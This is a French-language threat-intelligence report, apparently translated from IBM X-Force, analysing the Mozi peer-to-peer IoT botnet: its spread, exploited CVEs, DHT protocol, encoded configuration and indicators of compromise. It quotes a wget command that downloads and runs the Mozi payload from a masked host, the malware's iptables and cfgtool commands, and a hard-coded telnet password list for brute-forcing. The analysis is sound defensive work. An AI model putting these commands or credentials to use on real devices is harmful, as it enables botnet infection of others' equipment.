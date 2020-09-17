Sécurité

IBM X-Force a découvert qu'un acteur relativement nouveau dans le domaine des menaces, le botnet Mozi s'est imposé sur les appareils de l'Internet des objets (IoT).

Ce logiciel malveillant est actif depuis fin 2019 et présente des similitudes de code avec Mirai et ses variantes. Mozi a représenté près de 90 % du trafic réseau IdO observé entre octobre 2019 et juin 2020.

Ce rachat surprenant s'est accompagné d'une forte augmentation de l'activité globale des botnets IdO, ce qui suggère que Mozi n'a pas retiré ses concurrents du marché. Au contraire, elle a inondé le marché, éclipsant l’activité des autres variantes. Dans l'ensemble, les instances d'attaques IdO combinées d'octobre 2019, lorsque les attaques ont commencé à augmenter de manière notable, jusqu'à juin 2020, sont 400 % plus élevées que les instances d'attaques IdO combinées des deux années précédentes.

Graphique du volume des attaques IdO de juin 2018 à mai 2020

Cette augmentation des attaques IdO peut être due à un certain nombre de causes, mais peut en partie résulter d’un environnement IdO en constante expansion pour les acteurs de la menace cibler. Environ 31 milliards d’appareils IdO sont déployés dans le monde, et le taux de déploiement IdO est désormais de 127 appareils par seconde.

Les attaquants exploitent ces appareils depuis un certain temps déjà, notamment via le botnet Mirai. L'équipe IBM X-Force Incident Response and Intelligence Services (IRIS) le suit depuis près de quatre ans. Alors pourquoi ce saut soudain ? Les recherches IBM suggèrent que Mozi continue à connaître du succès, en grande partie grâce à l'utilisation d'attaques par injection de commandes (CMDi), qui sont souvent dues à une mauvaise configuration des appareils IdO. La croissance continue de l’utilisation de l’IdO et les mauvais protocoles de configuration sont les responsables probables de cette hausse. Cette augmentation peut avoir été alimentée par le fait que les réseaux d'entreprise sont plus souvent accessibles à distance en raison de COVID-19.

Les objets connectés sont partout

Un botnet IdO peut être utilisé pour effectuer des attaques par déni de service distribué (DDoS), voler des données et envoyer du spam. Il existe une pléthore de différents types d’appareils IdO à exploiter :

  • IdO grand public : appareils domestiques, tels que des caméras de sécurité, des commandes d'éclairage, des appareils électroménagers, etc.
  • IdO commercial : appareils conçus pour être utilisés dans divers secteurs. Par exemple, le secteur de la santé propose des pacemakers et des moniteurs connectés à Internet. Les secteurs du transport et de la construction utilisent des dispositifs associés aux systèmes de suivi des véhicules, à la télématique, aux systèmes logistiques et de chaîne d’approvisionnement et à la modélisation des données du bâtiment.
  • IdO d'entreprise : Appareils conçus pour être utilisés dans les bureaux, tels que les projecteurs, les routeurs, les systèmes de sécurité et la publicité numérique.
  • L'IdO industriel : Systèmes de contrôle industriel, systèmes d'automatisation des lignes de production, contrôleurs logiques et systèmes aéronautiques.
  • Infrastructure IdO : Systèmes de gestion des villes intelligentes, dispositifs de contrôle du trafic, dispositifs de surveillance de fonctionnalité, etc.
  • Internet des objets militaires : dispositifs biométriques de combat portables, robots et équipements de surveillance.

Cette grande surface d’attaque laisse les Entreprises vulnérables aux botnets IdO. Ajoutez à cela les failles de sécurité que présentent souvent ces appareils prêts à l'emploi et les pratiques de durcissement laxistes lors du déploiement. La vulnérabilité la plus notable dans l'IdO provient des attaques CMDi.

Les attaques CMDi génèrent le botnet Mozi

Presque toutes les attaques IdO observées par IBM ont tenté d'utiliser des attaques CMDi pour obtenir un accès initial à l'appareil. Si le point de terminaison ciblé était un appareil IdO et est vulnérable à ces attaques, la charge utile a été téléchargée et exécutée.

Les attaques CMDi sont extrêmement populaires contre les appareils IdO pour plusieurs raisons. Tout d’abord, les systèmes intégrés IdO contiennent généralement une interface Web et une interface de débogage laissées par le développement de microprogrammes qui peuvent être exploitées. Deuxièmement, les modules PHP intégrés dans les interfaces web de l'IdO peuvent être exploités pour donner à des acteurs malveillants une capacité d'exécution à distance. Et troisièmement, les interfaces IdO sont souvent vulnérables lorsqu’elles sont déployées, car les administrateurs ne parviennent pas à durcir les interfaces en nettoyant l'entrée attendue. Cela permet aux acteurs de la menace d'entrée des commandes shell telles que « wget ».

Notre analyse a révélé que le botnet Mozi tire parti de CMDi en utilisant une commande shell « wget », puis en modifiant les autorisations pour permettre à l'acteur de la menace d'interagir avec le système concerné. En voici quelques exemples :

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a ; chmod 777 /var/tmp/mozi.a ; rm -rf /var/tmp/mozi.a

Si l’hôte était vulnérable à CMDi, cette commande téléchargeait et exécutait un fichier appelé « mozi.a ». Notre analyse de cet échantillon particulier indique que le fichier s'exécute sur un microprocesseur sans étages pipelinés interverrouillés (MIPS). Il s’agit d’une extension comprise par les machines exécutant une architecture d’ordinateur à ensemble d’instructions réduit (RISC), qui est répandue sur de nombreux appareils IdO. Une fois que l’attaquant obtient un accès complet à l’appareil via le botnet, le niveau du firmware peut être modifié et des logiciels malveillants supplémentaires peuvent être implantés sur l’appareil.

Bien que cet exemple cite un vecteur bien connu, il peut continuer à être efficace pour deux raisons principales. Premièrement, les nouvelles vulnérabilités permettent une mise à jour constante des tentatives d'exploitation via CMDi, et la lenteur de la mise en œuvre des correctifs peut être exploitée. Deuxièmement, cette activité est facilement automatisable, ce qui permet aux acteurs de la menace de cibler rapidement et à moindre coût un large éventail d’appareils.

L'infrastructure du botnet Mozi semble provenir principalement de Chine, représentant 84 % de l'infrastructure observée. Ce fait concorde avec d'autres recherches open source sur l'activité de l'IdO en 2020.

Vous trouverez ci-dessous une liste des vulnérabilités qu'IBM a observé que le botnet Mozi tentait d'exploiter :

VulnérabilitéAppareil affecté
CVE-2017-17215Huawei HG532
CVE-2018-10561 / CVE-2018-10562Routeurs GPON
CVE-2014-8361Appareils utilisant le SDK Realtek
Routeur sans fil Eir D1000 RCIRouteur sans fil Eir D1000
CVE-2008-4873Sepal SPBOARD
CVE-2016-6277Netgear R7000 / R6400
Netgear setup.cgi RCE non authentifiéNetgear DGN1000
Exécution des commandes DVR MVPowerDVR MVPower TV-7104HE
CVE-2015-2051Appareils D-Link
Exécution de commandes SOAP UPnP D-LinkAppareils D-Link
Fournisseurs de systèmes de vidéosurveillance RCEPlusieurs fournisseurs de systèmes de vidéosurveillance (DVR)
Analyse technique du botnet Mozi

Le botnet Mozi est un botnet peer-to-peer (P2P) basé sur le protocole DSHT (distributed sloppy hash table), qui peut se propager via l'exploitation de dispositifs IdO et de mots de passe telnet faibles.

Une fois exécuté, le botnet Mozi tente de lier le port UDP local 14737. L'exemple lit /proc/net/tcp ou /proc/net/raw pour trouver et tuer les processus qui utilisent les ports 1536 et 5888. L'exemple vérifie si le fichier /usr/bin/python existe. S'il existe, l'exemple change le nom de son processus en sshd. Dans le cas contraire, l'échantillon le remplace par dropbear.

Le botnet Mozi est connu pour posséder au moins deux caractéristiques uniques. Il utilise l’ECDSA384 (algorithme de signature numérique de courbe elliptique 384) pour Verify son intégrité. De plus, il réutilise des parties du code Gafgyt.

Il contient des nœuds publics DHT codés en dur, qui peuvent être utilisés pour rejoindre le réseau P2P. Ces nœuds sont :

dht[.]transmissionbt[.]com:6881
routeur[.]bittorrent[.]com:6881
routeur[.]utorrent[.]com:6881
bttracker[.]debian[.]org :6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Le botnet Mozi possède quatre capacités principales. Il peut mener une attaque DDoS (HTTP, TCP, UDP) ; mener des attaques par exécution de commande ; télécharger et exécuter le contenu malveillant à partir de l’URL spécifiée ; et recueillir des informations sur les bots.

Liste des fichiers

Le tableau ci-dessous contient des informations détaillées sur les fichiers analysés. Les détails comprennent à la fois les fichiers soumis et les fichiers résiduels. (Les fichiers résiduels sont des fichiers extraits statiquement ou dynamiquement lors d’une analyse de logiciels malveillants.) Les données incluent le nom du fichier, les catégories de fichier telles que déterminées par analyse, le hachage du fichier et la parenté des fichiers par rapport aux autres fichiers du tableau.

Nom du fichierCatégorie de fichierFichier HashParent
mozi.mBotnet4dde761681684d7edad4e5e1ffdb940bS/O
5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0aBotnet86d42d968d3d12c36722e16c78e49ffbmozi.m
mozi.aBotnet9a111588a7db15b796421bd13a949cd4S/O
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053dBotnetdd4b6f3216709e193ed9f06c37bcc3890mozi.a

Analyse comportementale du botnet Mozi

Lors de l'exécution, l'exemple tente de lier le port UDP local 14737. L'exemple lit /proc/net/tcp ou /proc/net/raw pour trouver et tuer les processus qui utilisent les ports 1536 et 5888. L'exemple vérifie si le fichier /usr/bin/python existe. S'il existe, l'exemple change le nom de son processus en sshd. Dans le cas contraire, l'échantillon le remplace par dropbear :

L'exemple vérifie si le fichier /usr/bin/python existe. S'il existe, l'exemple change le nom de son processus en sshd. Sinon, le sample le change en dropbear

L’exemple tente également de mettre à jour la liste de contrôle d’accès pour bloquer SSH et telnet afin d’empêcher d’autres botnets de les utiliser.

iptables -I entrée -p tcp --destination-port 22 -j DROP
 iptables -I entrée -p tcp --destination-port 23 -j DROP
 iptables -I entrée -p tcp --destination-port 2323 -j DROP
 iptables -I production -p tcp --source-port 22 -j DROP
 iptables -I production -p tcp --source-port 23 -j DROP
 iptables -I production -p tcp --source-port 2323 -j DROP

Il sélectionne également de manière aléatoire des ports codés en dur dans l'iptable :

Capture d'écran réalisée pour l'article de blog

DHT

Le botnet Mozi utilise un protocole DHT personnalisé pour développer son réseau P2P. Le processus d'intégration d'un nouveau nœud Mozi dans le réseau DHT est le suivant :

  • Un nouveau nœud Mozi envoie une requête HTTP initiale à http[ :]//ia[.]51[.]la pour s'enregistrer.
  • Un nouveau nœud Mozi envoie une requête DHT find_node à huit nœuds publics DHT codés en dur et connecte ces nœuds pour les rejoindre au réseau. Trouver le nœud est utilisé pour trouver les informations de contact d’un nœud en fonction de son ID. Ces huit nœuds publics DHT codés en dur sont les suivants :
dht[.]transmissionbt[.]com:6881
routeur[.]bittorrent[.]com:6881
routeur[.]utorrent[.]com:6881
bttracker[.]debian[.]org :6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

L'échantillon doit générer un identifiant pour le nœud actuel. Selon un rapport 360 de Netlab sur le Mozi, «  l’ID est de 20 octets et se compose du préfixe 888888 intégré dans l’échantillon ou du préfixe spécifié par le fichier de configuration [hp], ainsi que d’une chaîne générée aléatoirement ». Le fichier de configuration est présenté ci-dessous :.

[ss]bot[/ss][hp]88888888[/hp][count]http[ :]//ia[.]51[.]LA/GO1 ?id=19894027&pu=http%3a%2f%2fbaidu.com/[IDP][/count]

Pour rejoindre le réseau DHT, l’exemple envoie une requête ping à ces nœuds publics DHT codés en dur. La requête ping avec identifiant de nœud est affichée dans le trafic dans la figure Wireshark ci-dessous

La requête ping avec l’identifiant du nœud est affichée dans le trafic du Wireshark

Analyse statique

Les deux échantillons sont conditionnés à l'aide d'un packer UPX personnalisé. Elle efface la valeur de p_file_size et p_blocksize à zéro dans p_info structure.

Fichier de configuration

L'exemple contient le fichier de configuration codé en dur ci-dessous :

L'exemple qui contient un fichier de configuration codé en dur

Il contient quatre sections :

  • Bleu : données de configuration (428 octets)
  • Vert : ECDSA384 signature 1 (96 octets)
  • Rouge : Version de configuration (4 octets)
  • Noir : ECDSA384 signature 2 (96 octets)

Les données de configuration sont encodées à l’aide d’une clé XOR codée en dur, 4E665A8F80C8AC238DAC4706D54F6F7E. Les données de configuration décodées sont présentées ci-dessous :

[ss]bot[/ss][hp]88888888[/hp][count]http[ :]//ia[.]51[.]LA/GO1 ?id=19894027&pu=http%3a%2f%2fbaidu.com/[IDP][/count]

Les données de configuration prennent en charge plusieurs commandes étiquetées comme suit :

Tag (commande)Description
[ss]Rôle du bot
[ssx]activer/désactiver le tag [ss]
[cpu]Architecture du processeur
[cpux]activer/désactiver l'étiquette [cpu]
[nd]nouveau nœud DHT
[hp]Préfixe de hachage du nœud DHT
[atk]Type d'attaque DDoS
[ver]Valeur en section V dans le protcol DHT
[sv]Mettre à jour la configuration
[ud]Mise à jour du bot
[dr]Téléchargez et exécutez la charge utile à partir de l'URL spécifiée
[rn]Exécuter la commande spécifiée
[dip]ip :port pour télécharger Mozi bot
[idp]rapport bot
[compte]URL utilisée pour signaler le bot

Le botnet Mozi réutilise certaines parties du code Gafgyt lors de l'attaque DDoS. Il prend en charge plusieurs types d'attaques DDoS telles que HTTP, TCP et UDP.

La signature ECDSA384 1 est utilisée pour Verify la valeur de hachage des données de configuration. La clé publique codée en dur utilisée pour Verify est la suivante :

4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88

Il est encodé avec la clé XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clé publique décodée est :

02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 06

La version de la configuration détermine à quel moment le bot doit être mis à jour. Il mettra à jour le bot lorsque cette valeur est supérieure à sa valeur actuelle. ECDSA384 signature 2 sert à vérifier ces trois premières parties du fichier de configuration. La clé publique codée en dur utilisée pour Verify est la suivante :

4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 94 A 9E

Il est encodé avec la clé XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clé publique décodée est :

02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 
27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 
76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea 
Ef

Énumération des connexions Telnet

En plus des vulnérabilités que le botnet Mozi exploite pour accéder à l’appareil victime, le botnet Mozi peut également forcer les identifiants telnet en utilisant une liste codée en dur :

root
admin
CUAdmin
default
rapport
super
telnetadmin
! !! 








Huawei
keomeo
support
CMCCAdmin
e8telnet
e8ehome1
e8ehome
user
mother
Administrator
service
supervisor
guest
admin1
administrator
666666
888888
ubnt
tech
xc3511
vizxv
Pon521
e2008jl
r@p8p0r+
GM8182
gpon
Zte521
hg2x0
epicrouter
conexant xml-p
 
adminHW
2010vesta
2011vesta
plumeria0077
cat1029
123456
54321
hi3518
password
12345
fucker
pass
admin1234
11
smcadmin
1234
klv123
klv1234
zte
jvbzd
anko
zlxx
7ujMko0vizxv
7ujMko0admin
system
ikwb
dreambox
realtek
00000000
1111111 xml-ph-00

Une force brute de connexion telnet utilisée par l'échantillon est la suivante :

Une connexion Telnet par force

Indicateurs

Mozi.m et Mozi.a

Réseau

dht[.]transmissionbt[.]com:6881
routeur[.]bittorrent[.]com:6881
routeur[.]utorrent[.]com:6881
bttracker[.]debian[.]org :6881
212[.]129[.]33[.]59:6881
82[.]221[.]103[.]244:6881
130[.]239[.]18[.]159:6881
87[.]98[.]162[.]88:6881

Cordes notables (décompressées)

8.8.8.8
/proc/net/route
Mozilla/4.0 (Compatible ; MSIE 8.0 ; Windows NT 5.2 ; Trident/6.0)
Mozilla/4.0 (compatible ; MSIE 10.0 ; Windows NT 6.1 ; Trident/5.0)
Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 5.1 ; pl) Opera 11.00
 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.0 ; fr) Opera 11.00
 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.0 ; et) Opera 11.00
 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.1 ; de) Opera 11.01
 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.1 ; fr) Opera 11.00
 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.102 Safari/537.36
 Mozilla/5.0 (Windows NT 10.0 ; Win64 ; x64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; rv :45.0) Gecko/20100101 Firefox/45.0
 Mozilla/5.0 (iPhone ; CPU iPhone OS 8_4 comme Mac OS X) AppleWebKit/600.1.4 (KHTML, comme Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; rv:41.0) Gecko/20100101 Firefox/41.0
 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/45.0.2454.101 Safari/537.36
 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/46.0.2490.80 Safari/537.36
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, comme Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, comme Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; Trident/7.0 ; rv:11.0) comme Gecko
Mozilla/4.0 (compatible ; MSIE 6.1 ; Windows XP)
 Opera/9.80 (Windows NT 5.2 ; U ; ru) Presto/2.5.22 Version/10.51
 Opera/9.80 (X11 ; Linux i686 ; Ubuntu/14.10) Presto/2.12.388 Version/12.16
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, comme Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.102 Safari/537.36
 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux ; Android 4.4.3) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
 Mozilla/5.0 (Linux ; Android 4.4.3 ; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, comme Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible ; MSIE 8.0 ; X11 ; Linux x86_64 ; pl) Opera 11.00
 Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows 98 ; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 5.1 ; Trident/5.0)
Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.0 ; Trident/4.0 ; GTB7.4 ; InfoPath.3 ; SV1 ; .NET CLR 3.4.53360 ; WOW64 ; en-US)
 Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/4.0 ; FDM ; MSIE Crawler ; Media Center PC 5.0)
 Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/4.0 ; GTB7.4 ; InfoPath.2 ; SV1 ; .NET CLR 4.4.58799 ; WOW64 ; en-US)
 Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0 ; FunWebProducts)
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.6 ; rv :25.0) Gecko/20100101 Firefox/25.0
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.8 ; rv :21.0) Gecko/20100101 Firefox/21.0
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.8 ; rv :24.0) Gecko/20100101 Firefox/24.0
 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_10 ; rv :33.0) Gecko/20100101 Firefox/33.0
OBTENIR
TÊTE
PUBLIER
. /config
/tmp/config
 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1”
 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi”
 iptables -I entrée -p tcp --destination-port 35000 -j DROP
 iptables -I entrée -p tcp --destination-port 50023 -j DROP
 iptables -I production -p tcp --source-port 50023 -j DROP
 iptables -I production -p tcp --source-port 35000 -j DROP
 iptables -I entrée -p tcp --destination-port 7547 -j DROP
 iptables -I production -p tcp --source-port 7547 -j DROP
 [cpux]
 [/cpux]
 [processeur]
 [/cpu]
 [ssx]
 [/ssx]
 [ss]
 [/ss]
 aucun
 [sv]
 [/sv]
 [rn]
 [/rn]
 courir:
 [nd]
 [/nd]
 /tmp
 /var
 /temp
 iptables -I entrée -p udp --destination-port %d -j ACCEPT
 iptables -I production -p udp --source-port %d -j ACCEPT
 iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
 iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
 0.0.0.0
 [idp]
 Ce nœud n'accepte pas les annonces.
 dht.transmissionbt.com:6881
router.bittorrent.com:6881
router.utorrent.com:6881
bttracker.debian.org:6881
212.129.33.59:6881
82.221.103.244:6881
130.239.18.159:6881
87.98.162.88:6881

Conclusion

Le paysage des botnets IoT continue d'évoluer et les données d'IBM Security suggèrent que les acteurs de la menace restent actifs dans cet espace. Alors que de nouveaux groupes de botnets, tels que Mozi, intensifient leurs opérations et que l'activité globale de l'IdO augmente, les entreprises utilisant des dispositifs IdO doivent être conscientes de l'évolution de la menace. IBM voit de plus en plus d’appareils IdO d’entreprise sous le feu des pirates informatiques. L'injection de commandes reste le principal vecteur d'infection choisi par les acteurs de la menace, ce qui rappelle combien il est important de modifier les paramètres par défaut des appareils et d'utiliser des tests d'intrusion efficaces pour trouver et appliquer des correctifs dans le blindage.

Attributs du fichier

Métadonnées Mozi.m

Nom de fichier :Mozi.m
Taille de fichier :108 808
MD5 :4dde761681684d7edad4e5e1ffdb940b
SHA1 :2327be693bc11a618c380d7d3abc2382d870d48b
SHA256 :d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Type de fichier :Exécutable ELF 32 bits MSB, MIPS, MIPS-I version 1 (SYSV), lié statiquement, dépouillé
Catégorie :Botnet
Nom IRIS :Mozi
Autres noms :

Mozi.a Metadata

Nom de fichier :Mozi.a
Taille de fichier :95 268
MD5 :9a111588a7db15b796421bd13a949cd4
SHA1 :034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256 :e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Type de fichier :Exécutable ELF 32 bits LSB, ARM, version 1, lié statiquement, dépouillé
Catégorie :Botnet
Nom IRIS :Mozi
Autres noms : 

Métadonnées 5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a

Nom de fichier :d546_unpacked
Taille de fichier :266 108
MD5 :86d42d968d3d12c36722e16c78e49ffb
SHA1 :ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
SHA256 :5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
Type de fichier :Exécutable ELF 32 bits MSB, MIPS, MIPS-I version 1 (SYSV), lié statiquement, dépouillé
Catégorie :Botnet
Nom IRIS :Mozi
Autres noms : 

83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Métadonnées

Nom de fichier :83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Taille de fichier :212 464
MD5 :dd4b6f3216709e193ed9f06c37bcc389
SHA1 :758ba1ab22dd37f0f9d6fd09419bfef44f810345
SHA256 :83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
Type de fichier :b'ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped'' (exécutable 32 bit LSB, ARM, version 1, lié statiquement, dépouillé)
Catégorie :Botnet
Nom IRIS :Mozi
Autres noms : 